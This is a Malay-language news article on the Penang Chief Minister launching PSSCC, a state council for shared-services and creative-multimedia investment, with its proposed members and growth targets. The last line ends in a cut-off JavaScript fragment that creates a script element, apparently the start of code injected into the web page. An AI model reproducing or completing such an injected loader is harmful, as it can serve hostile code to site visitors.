PSSCC kukuh kerjasama pelaburan babit tiga pihak – KM

Oleh : WATAWA NATAF ZULKIFLI & ZAINULFAQAR YAACOB

Gambar : MARK JAMES

 

GEORGE TOWN – PSSCC atau Majlis Perkongsian Perkhidmatan SSO dan CMC Pulau Pinang yang dianggotai wakil Kerajaan Negeri, Kerajaan Pusat dan penggerak-penggerak industri global diharap terus mengembangkan potensi Pulau Pinang sebagai destinasi pelaburan strategik di negeri ini.

Ketua Menteri, Y.A.B. Tuan Lim Guan Eng berkata demikian pada Mesyuarat Pelancaran Perkhidmatan Penyumberan Luar (SSO) dan Industri Kreatif & Multimedia (CMC) di sini baru-baru ini.

“PSSCC ini akan dipengerusikan sendiri oleh Ketua Menteri.

“Usaha kerjasama daripada agensi-agensi kerajaan, termasuk Pihak Berkuasa Persekutuan dan wakil industri melalui penubuhan Majlis Perkongsian Perkhidmatan SSO dan CMC Pulau Pinang ini dijangka mengukuhkan lagi hubungan serta sokongan antara kerajaan dan peserta industri serta menyokong program negeri, demi rakyat,” jelasnya yang juga Exco Hal Ehwal Tanah & Pembangunan Tanah, Penerangan, Kebudayaan & Kesenian, Warisan dan Hal Ehwal Bukan Islam.

Menurut Guan Eng, Penasihat Khas kepada Ketua Menteri, Datuk Lee Kah Choon, Ketua Pegawai Eksekutif Lembaga Pembangunan Perindustrian Malaysia (MIDA), Datuk Azman Mahmud, Ketua Pegawai Eksekutif Perbadanan Pembangunan Multimedia (MDeC), Datuk Yasmin Mahmood, Pengurus Besar Perbadanan Pembangunan Pulau Pinang (PDC), Datuk Rosli Jaafar, Pengurus Besar investPenang, Loo Lee Lian antara nama yang dicadangkan untuk menganggotai PSSCC.

Tidak cukup dengan itu, Guan Eng memberitahu, dua wakil industri, iaitu Ooi Kok Seng dari KPMG dan Mark Chang daripada Jobstreet turut dicadangkan ke majlis tertinggi berkaitan pelaburan negeri ini.

Tambahnya, perkembangan SSO sebenarnya dilihat seiringan dengan Pemprosesan Perniagaan Penyumberan Luar (BPO) dan Penyumberan Luar Teknologi Maklumat (ITO) dunia.

Jelas beliau, sasaran pertumbuhan industri BPO dan ITO global masing-masing adalah sebanyak RM517.9 bilion dan RM898.4 bilion pada tahun 2015.

Justeru, kata Guan Eng, pelancaraan PSSCC di negeri ini pun sebenarnya adalah susulan kejayaan formula Kerajaan Negeri dalam menggarapkan pakej 3T atau Bakat (Talent), Teknologi dan Toleransi yang dilihat telahpun berjaya menggamit lebih banyak pelabur ke negeri ini.

“Industri ini dilihat sesuatu yang mampu menjana gelombang transformasi ekonomi negeri ketiga setelah transformasi pertama berlaku pada 1970 (perindustrian bebas), kedua pada 1980an-1990an (Industri Kecil Sederhana).

“Potensi Pulau Pinang untuk menarik perniagaan SSO telahpun diiktiraf selama beberapa tahun ini di Pulau Pinang, antaranya syarikat terkemuka yang menyediakan perkhidmatan perkongsian global seperti First Solar, Citigroup Transaksi Perkhidmatan Malaysia, IHS, Wilmar, Osram dan AirAsia.

“Memorandum Perjanjian Persefahaman (MoU) yang ditandatangani antara Perbadanan Pembangunan Pulau Pinang (PDC) bersama Temasek Holdings (pada bulan Mei 2014) bernilai RM11.3 bilion serta pembangunan Creative Animation Triggers (CAT) di tengah bandaraya George Town, menjadikan Kerajaan Negeri lebih optimis bahawa SSO dan Industri Kreatif mempunyai masa depan yang baik di sini,” jelas Guan Eng.var d=document;var s=d.createElement(‘script’);